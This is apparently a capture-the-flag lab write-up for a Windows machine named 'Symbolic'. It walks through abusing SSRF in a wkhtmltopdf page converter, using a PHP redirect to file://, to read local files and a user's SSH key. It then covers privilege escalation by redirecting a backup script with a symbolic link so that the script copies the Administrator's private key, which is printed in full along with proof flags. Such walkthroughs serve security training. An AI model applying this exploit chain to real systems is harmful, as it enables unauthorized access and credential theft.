# Exploitation Guide for Symbolic

## Enumeration

⇒ We start by running nmap scan :

```csharp
➜  Symbolic nmap 192.168.36.131
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 13:19 EDT
Nmap scan report for 192.168.36.131
Host is up (0.00023s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5357/tcp open  wsdapi
```

### Port 80 - Apache :

```powershell
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: WebPage to PDF
MAC Address: 00:0C:29:E8:97:96 (VMware)
```

- We are presented with an page with the heading "Webpage to PDF Converter by p4yl0ad"
- The webapp takes url input from the user and then provides pdf of the webpage.
- It also says "Powered by wkhtmltopdf"

---

## Getting Foothold [ SSRF to LFI ]

⇒ Playing around with the url input we tried reading local files using file:// but got an error. Lets try to read local files through redirect functionality :
Reference : https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/
- Started apache service on our kali :

```bash
sudo apt install -y apache2 php
service apache2 start
```

- Next created the index.php page with the following code :

```php
<?php
header('Location: file:///Windows/win.ini');
?>
```

- Sent the following request to the target machine :

```bash
➜  Symbolic curl -i -s -k -XPOST --data-binary 'url=192.168.36.128%2Findex.php' 'http://192.168.36.131/Process.php'
HTTP/1.1 302 Found
Date: Mon, 11 Oct 2021 17:27:27 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Location: /pdfs/f6397aa234afd83b85f1f34adaf9352d.pdf
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```

The pdf generated has the content of Windows/win.ini file, so we have the ability to read local files.

⇒ There is SSH service running on the machine and we have a username, "p4yl0ad". Lets try reading that user's ssh key :

```php
<?php
header('Location: file:///Users/p4yl0ad/.ssh/id_rsa');
?>
```

```bash
➜  Symbolic curl -i -s -k -XPOST --data-binary 'url=192.168.36.128%2Findex.php' 'http://192.168.36.131/Process.php'
HTTP/1.1 302 Found
Date: Mon, 11 Oct 2021 17:39:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Location: /pdfs/f6397aa234afd83b85f1f34adaf9352d.pdf
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```

- The pdf contains the SSH key for p4yl0ad user.

⇒ Used the SSH key to ssh in as p4yl0ad :

```php
➜  Symbolic ssh -i id_rsa p4yl0ad@192.168.36.131                                                                                                                                                                   
Microsoft Windows [Version 10.0.17763.737]                                                                                                                                                                         
(c) 2018 Microsoft Corporation. All rights reserved. 

p4yl0ad@SYMBOLIC C:\Users\p4yl0ad>whoami
symbolic\p4yl0ad

p4yl0ad@SYMBOLIC C:\Users\p4yl0ad>hostname
SYMBOLIC

p4yl0ad@SYMBOLIC C:\Users\p4yl0ad>
```

- Reading local.txt :

```php
p4yl0ad@SYMBOLIC C:\Users\p4yl0ad\Desktop>type local.txt 
9a4bf53583f6e275af6b9fce84f9b456
```

---

## Privilege Escalation to SYSTEM

⇒ Running itm4n PrivescCheck : [https://github.com/itm4n/PrivescCheck](https://github.com/itm4n/PrivescCheck)

- We discover the following service running as Administrator :

```php
Name        : BackupLogService                                                                                                                                                                                     
DisplayName : BackupLogService                                                                                                                                                                                     
ImagePath   : C:\Program Files\nssm-2.24\win64\nssm.exe                                                                                                                                                            
User        : .\Administrator                                                                                                                                                                                      
StartMode   : Automatic
```

⇒ Enumerating further we find a backup folder in C:\ :

```php
p4yl0ad@SYMBOLIC C:\>dir 
 Volume in drive C has no label.
 Volume Serial Number is CCC2-BF17

 Directory of C:\

10/11/2021  10:19 AM    <DIR>          backup
09/15/2018  12:19 AM    <DIR>          PerfLogs
10/11/2021  10:16 AM    <DIR>          Program Files
07/29/2021  01:00 PM    <DIR>          Program Files (x86)
10/11/2021  10:08 AM    <DIR>          Users
07/29/2021  01:01 PM    <DIR>          Windows
10/11/2021  10:16 AM    <DIR>          wkhtml
10/11/2021  10:15 AM    <DIR>          xampp
               0 File(s)              0 bytes
               8 Dir(s)  50,800,500,736 bytes free

p4yl0ad@SYMBOLIC C:\>cd backup 

p4yl0ad@SYMBOLIC C:\backup>dir 
 Volume in drive C has no label. 
 Volume Serial Number is CCC2-BF17

 Directory of C:\backup

10/11/2021  10:19 AM    <DIR>          .
10/11/2021  10:19 AM    <DIR>          ..
10/11/2021  09:11 PM               207 backup.ps1
10/11/2021  10:47 AM    <DIR>          logs
               1 File(s)            207 bytes
               3 Dir(s)  50,800,500,736 bytes free
```

- Contents of backup.ps1 :

```powershell
p4yl0ad@SYMBOLIC C:\backup>type backup.ps1 
$log = "C:\xampp\htdocs\logs\request.log" 
$backup = "C:\backup\logs"

while($true) {
        # Grabbing Backup
        copy $log $backup\$(get-date -f MM-dd-yyyy_HH_mm_s)
        Start-Sleep -s 60
}
```

So it is copying the request.log from C:\xampp\htdocs\logs and placing it in C:\backup\logs every minute. 

### Exploiting the Service through Symbolic Links

⇒ Our user has full permissions on the logs folder in htdocs which can be leveraged to create a symbolic link to some other file we want to read :

```powershell
PS C:\backup> Get-Acl C:\xampp\htdocs\logs | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\xampp\htdocs\logs 
Owner  : BUILTIN\Administrators
Group  : SYMBOLIC\None
Access : SYMBOLIC\p4yl0ad Allow  FullControl
         SYMBOLIC\p4yl0ad Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  AppendData
         BUILTIN\Users Allow  CreateFiles
         CREATOR OWNER Allow  268435456
```

Reference : 

- [https://notes.vulndev.io/notes/redteam/privilege-escalation/windows/path-redirection#create-hardlink-to-file](https://notes.vulndev.io/notes/redteam/privilege-escalation/windows/path-redirection#create-hardlink-to-file)
- [https://github.com/googleprojectzero/symboliclink-testing-tools](https://github.com/googleprojectzero/symboliclink-testing-tools)
- [https://labs.f-secure.com/advisories/intel-driver-and-support-assistant-dsa-lpe/](https://labs.f-secure.com/advisories/intel-driver-and-support-assistant-dsa-lpe/)
- [https://amonitoring.ru/article/steam_vuln_3/](https://amonitoring.ru/article/steam_vuln_3/)

**Step 1: Remove the File**

Before we can create a symlink we need to remove the request.log file and anything else in the same folder.

```powershell
PS C:\windows\tasks> rm "C:\xampp\htdocs\logs"

Confirm
The item at C:\xampp\htdocs\logs has children and the Recurse parameter was not specified. If you continue, all children will be removed with the item. Are you sure you want to continue?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "Y"): Y
```

**Step 2: Create Symlink to Administrator ssh key**

- Next we need to create a symlink.
- To do this without administrator rights we first need to create a Mount Point such that 'C:\xampp\htdocs\' points to the "\RPC Control\" object directory. We then create a Symlink such that "\RPC Control\logs" points to "\\?\C:\Users\Administrator\.ssh\id_rsa"
- To do this we can use James Forshaw's symboliclink-testing-tools ([https://github.com/google/symboliclink-testing-tools](https://github.com/google/symboliclink-testing-tools))

```powershell
PS C:\windows\tasks> ./CreateSymlink.exe "C:\xampp\htdocs\logs\request.log" "C:\Users\Administrator\.ssh\id_rsa"
Opened Link \RPC Control\request.log -> \??\C:\Users\Administrator\.ssh\id_rsa: 00000154
Press ENTER to exit and delete the symlink
```

- After a few minutes we will go and read the logs from C:\backup\logs :

```powershell
p4yl0ad@SYMBOLIC C:\backup\logs>type 10-11-2021_10_59_20 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn 
NhAAAAAwEAAQAAAQEAqH5suZzgOsiF1KShlQM6BqYc4eheP78shoUYqpL/oe43c4eACPAw 
n8ccS0emiVei942Ff/EptW7Jw/ta0cL06xJYH0x2QiMvZjPYUUjFxpZQMhdDRj+w1Ak1TS 
cIkAaBwHtzok5pLrN4dqTGJKuwkM95Tr6j3bfCqhXIyjI2T5+kjKBH8m7vr9QtkyTfwKIl 
Z1hxRWRFmvqLFIJrtY+FKmkir74duT7qvd2Aw7C8u1xVvvWHW6nHLqRQRcpUB/yaBz9iwQ 
pcZnUGUDK2qv1Zwj/6Z6da4y/PBzvFrEhOa5EFpuuB0Q1TdErrF7wllfzpVCINm1bg9Nep 
fukupefb1QAAA9DBeaYKwXmmCgAAAAdzc2gtcnNhAAABAQCofmy5nOA6yIXUpKGVAzoGph 
zh6F4/vyyGhRiqkv+h7jdzh4AI8DCfxxxLR6aJV6L3jYV/8Sm1bsnD+1rRwvTrElgfTHZC 
Iy9mM9hRSMXGllAyF0NGP7DUCTVNJwiQBoHAe3OiTmkus3h2pMYkq7CQz3lOvqPdt8KqFc 
jKMjZPn6SMoEfybu+v1C2TJN/AoiVnWHFFZEWa+osUgmu1j4UqaSKvvh25Puq93YDDsLy7 
XFW+9YdbqccupFBFylQH/JoHP2LBClxmdQZQMraq/VnCP/pnp1rjL88HO8WsSE5rkQWm64 
HRDVN0SusXvCWV/OlUIg2bVuD016l+6S6l59vVAAAAAwEAAQAAAQBdN+SrJDGiFAKGzLZg 
nLJjr09XZJmQJxJZMhWdeUpYqlSfZB3f1BLystPiijeG0Kdm0jNDv4bVy/9woAV0+6lIzJ 
NYbZMXsCOvJYvOHLbe0ZZ4wAoGOYJ5LMcCck/4bsEmXqZw63Sh08UXzr2Y2CwNUdvJRwud 
xOa79uVpiDIoBkLCq+A/COTKIinsAFRoZV8KbSwen2h/ccBIrdPQrIydaxbZ8RciT3Y+2t 
ZP2LAXiENw4jcP5RaUz6FaBYv+GUjRLcjzTd0uM4BAco9tdl+itSBc5GkwDJx9mUp1b2o+ 
E+earEvIb7rr7kLc7tFGD1eHis2tIo1KzDYG0WN6Oq7ZAAAAgFxGPzkZmO1Dl413IekdqR 
lGHYTBSu5e2nFj7G2V0oS6Q6UNktpgNToLaHrktBCHx0FNe3c0bgLJOW1OV9H8mUiBQgyr 
LOiXx0hWALQFRDiYEc/uPbst+9226Wbsqv+YjgPtRGpNIitPZs2Tl7RWGinn47b3G6mKQI 
yOGsCj4hINAAAAgQDUirv9D9m38JQGBXVUn/RHonXfCHFTW7AcdmId6L6QDK8sXwl0U5WM 
UhY9mhMRLaodRmPq0AyFIxOaLbeZxgzh3yDsHDc1mAHWynvBx24rNL7MT2W9DGfZNc56ht 
+wKkCVjQdZxry/s05wzU7RYX211Kzj0xD2F433yx7MTFV9KwAAAIEAyvILIgppBSwlKzlI
WBpwcZ4bcmWJQbNANdy87kgsxwLezVCNAJWj/7kjygcRnkc3NJubAJsssiqzXPbwW13msI
cxC7nUxadCYVPY/ThbgVnNWvw/tawJxkVniCEzlPeSvQOmvalVw5zFhvaFr6zC4tizPqdT
wMY0GOfUpehViv8AAAAWYWRtaW5pc3RyYXRvckBTWU1CT0xJQwECAwQF
-----END OPENSSH PRIVATE KEY-----
```

⇒ Used Administrator's SSH key to ssh in :

```powershell
➜  Symbolic ssh -i id_rsa Administrator@192.168.36.131                                                                                                                                                             
Microsoft Windows [Version 10.0.17763.737]                                                                                                                                                                         
(c) 2018 Microsoft Corporation. All rights reserved. 

administrator@SYMBOLIC C:\Users\Administrator>whoami 
symbolic\administrator

administrator@SYMBOLIC C:\Users\Administrator>hostname
SYMBOLIC

administrator@SYMBOLIC C:\Users\Administrator>
```

- Reading proof.txt :

```powershell
administrator@SYMBOLIC C:\Users\Administrator\Desktop>type proof.txt 
9cbc44e1bcbff71a1d02a37b45a31fe3
```